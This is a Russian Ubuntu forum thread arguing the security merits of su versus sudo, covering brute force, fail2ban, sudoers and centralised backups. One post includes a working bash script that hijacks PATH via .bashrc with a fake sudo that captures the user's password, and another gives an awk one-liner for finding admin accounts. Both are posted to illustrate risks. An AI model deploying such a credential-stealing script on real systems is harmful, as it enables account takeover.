отдельный пароль(пользователь sudo) нужен или нет?

[ArcFi]

В случае оставленного терминала авторизованного под root (ака su) систему можно ковырять как угодно.

С таким же успехом там может висеть "sudo -s"-консоль, или просто не истёк таймаут с последнего использования sudo.
И вообще, в случае незалоченного экрана можно залить трояна, и там уже без разницы относительно текущих привилегий.

Согласитесь, если брутфорсом долбать, то 4 изначально известных знака - это большой успех.

Возможность удалённого брутфорса отсекается настройкой iptables + fail2ban и отключением парольной аутентификации.
При локальном брутфорсе практически всегда есть способы узнать логин администратора.

Ничем админам серверов это не мешает...

Увы, мешает.
Например, без гемора не получится настроить нормальный централизованный бэкап с нескольких серваков.

[inkblack]

Ну, много разных косяков может быть.
Например:

Код: (bash) [Выделить]

sol@eee:~$ sudo fdisk -l  # Или что-то подобное, неважно, главное — sudo.
[sudo] password for sol:
# Здесь всякий вывод, понятное дело.
# А здесь наш горе-админ пошел обедать.
# И пришел злой шпиён:
sol@eee:~$ sudo -i
root@eee:~# Красота!
Поэтому не надо оставлять незалоченный компьютер.

А вот троян, пожалуйста:

Код: (bash) [Выделить]

#!/bin/bash
mkdir -p "$HOME/.secret"
echo PATH='"$HOME/.secret:$PATH"'>>.bashrc
cat <<EOF> $HOME/.secret/sudo
#!/bin/bash
echo -n "[sudo] password for $USER: "
read -s trash
echo
sleep 2
echo "Sorry, try again."
echo -n "[sudo] password for $USER: "
read -s password
echo
# Ищщо разный код...
rm -f -r "$HOME/.secret"
echo "А пароль у вас был такой: \$password, а теперь другой. Ищите :)"
EOF
chmod 700 $HOME/.secret/sudo
# Done
Теперь наш ничего не подозревающий админ пишет в терминале...

Код: (bash) [Выделить]

sudo apt-get install super-cool-program...вводит свой пароль...
COOL!

Поэтому не надо без необходимости сидеть под админской учеткой.

[fisher74]

При локальном брутфорсе практически всегда есть способы узнать логин администратора.

СПОСОБ. То есть нужно сделать какие-то действия, для определения. А в случае с root-паролем его и не надо узнавать.
А в случае с sudo - вот он root, а то что у него нет пароля ещё и догадаться надо.

С таким же успехом там может висеть "sudo -s"-консоль, или просто не истёк таймаут с последнего использования sudo.

А если параметром -s не пользоваться, то не может висеть. Ведь этоже аналог su с root-паролем.

Вообще,я и не говорю "оставлять" "не оставлять". Конечно это архиразгильдяйство. Но если такое произошло, то у sudo (без -s) время истечёт и потребуется ввод пароля, а вот для su не истечёт. То есть, опять плюс sudo. Чуточку, но более защищённое.
Про iptables  я тоже знаю. А ещё я знаю охраняемое помещение со строгим пропускным режимом и отрезанным сетевым кабелем. В этом случае, конечно, sudo отдыхает неудобством.
Но мне показалось, что мы обсуждаем su vs sudo без дополнительных плюшек, как самостоятельные механизмы защиты административных привилегий.

[victor00000]

https://forum.ubuntu.ru/index.php?topic=226324.msg1757699#msg1757699

[Scorry]

Ничем админам серверов это не мешает...

Увы, мешает.
Например, без гемора не получится настроить нормальный централизованный бэкап с нескольких серваков.

А разве что-то мешает админу сервера в десять секунд завести пароль руту?

[Чистый]

Scorry,
так на кой это sudo если все равно необходимо задавать пароль root....

[fisher74]

ну смысл от sudo всё равно остаётся. Даже с паролизированным root-ом.
Ведь часто бывают ситуации, когда пользователям необходимо предоставлять экстраординарные привилегии. Например, группе тех.поддержки дать возможность перезапускать какой-либо сервис (и только это). Отдавать для этого пароль root или переводить учётку в администраторы нет необходимости. Вот как раз тут поможет sudo с настроечным файлом sudoers.
Кстати, так можно и проблему освещённую ArcFi с бекапами решить без root-пароля (хотя возможно и не совсем правильно понимаю суть проблемы)

[ArcFi]

То есть нужно сделать какие-то действия, для определения.

Действия на уровне

Код: [Выделить]

awk -F: '/(adm|admin|root|sudo|wheel)/{print $4}' /etc/groupТ.е. не составят серьёзного препятствия для злоумышленника.

Ведь часто бывают ситуации, когда пользователям необходимо предоставлять экстраординарные привилегии.

Тут согласен, но если такой необходимости нет, и имеем одного администратора, то особого смысла в использовании sudo не вижу.

Суть проблемы с бэкапом в том, что нужно пройтись по списку хостов и синхронизовать с них некоторые файлы и каталоги.
Доступ к части файлов есть только у суперпользователя.
На самих хостах не хранится данных для аутентификации на бэкап-сервере.
Поэтому если один из них окажется скомпрометирован, угроза не сможет распространиться на бэкап-сервер.

[Scorry]

Scorry,
так на кой это sudo если все равно необходимо задавать пароль root....

Вы мне задаёте вопрос, причём риторический, на который стоило бы получить ответ у разработчиков sudo. Давно же уже всё расписано и рассказано.

[Чистый]

Scorry,
sudo удобно для домашних хомячков, в то время как в продакшине он не очень удобен, иначе тот же RHEL/CentOS бы по-умолчанию включал бы его в ОС, но его там нет, большинство дистрибутивов не отказались от root  так что наверно не все так сладко с sudo

[ArcFi]

Или вот, взять SFTP через файловый менеджер, без root в некоторые каталоги даже зайти не получится, а с загрузкой файлов дела обстоят ещё хуже.
Конечно, я в большинстве случаев использую rsync, но тем не менее, момент неприятный.

Давно же уже всё расписано и рассказано.

И прочитано, и проверено, и выводы сделаны.

[fisher74]

sudo удобно для домашних хомячков, в то время как в продакшине он не очень удобен

Как раз хомячкам-то он на хрен не сдался, а вот ситуацию на производстве с логичным применением sudo я чуть выше написал.

[victor00000]

ищо "за windows"

[ArcFi]

а вот ситуацию на производстве с логичным применением sudo я чуть выше написал

Всё верно, в многопользовательской среде это бывает удобно.
Но тут тоже надо смотреть, не предусмотрено ли решение задачи с помощью polkit или механизма групп.
Например, чтобы не запускать wireshark от суперпользователя, нужно добавить юзера в соответствующую группу.
Аналогично с запуском mplayer из консоли и группами audio/video.

Как раз хомячкам-то он на хрен не сдался...

Позвольте не согласиться.
Тогда хомячкам пришлось бы при установке системы вводить пароль "какого-то непонятного пользователя root".
Однако, не забываем, что хомячки часто не в состоянии придумать, запомнить и ввести достаточно криптостойкий пароль.
Как минимум, это противоречило бы политике ubuntu в плане системы для "простого пользователя".
Как максимум, создавало бы потенциального участника ботнета, ведь парольная аутентификация по умолчанию включена, фаервол не настроен, а средств, препятствующих брутфорсу, не установлено.

[Scorry]

Или вот, взять SFTP через файловый менеджер, без root в некоторые каталоги даже зайти не получится, а с загрузкой файлов дела обстоят ещё хуже.
Конечно, я в большинстве случаев использую rsync, но тем не менее, момент неприятный.

Мы тут, боюсь, превратим спор в дискуссию остроконечников и тупоконечников. Я не намеревался доказывать обязательность применения sudo, хотя так же точно я категорически против утверждения, что sudo есть зло.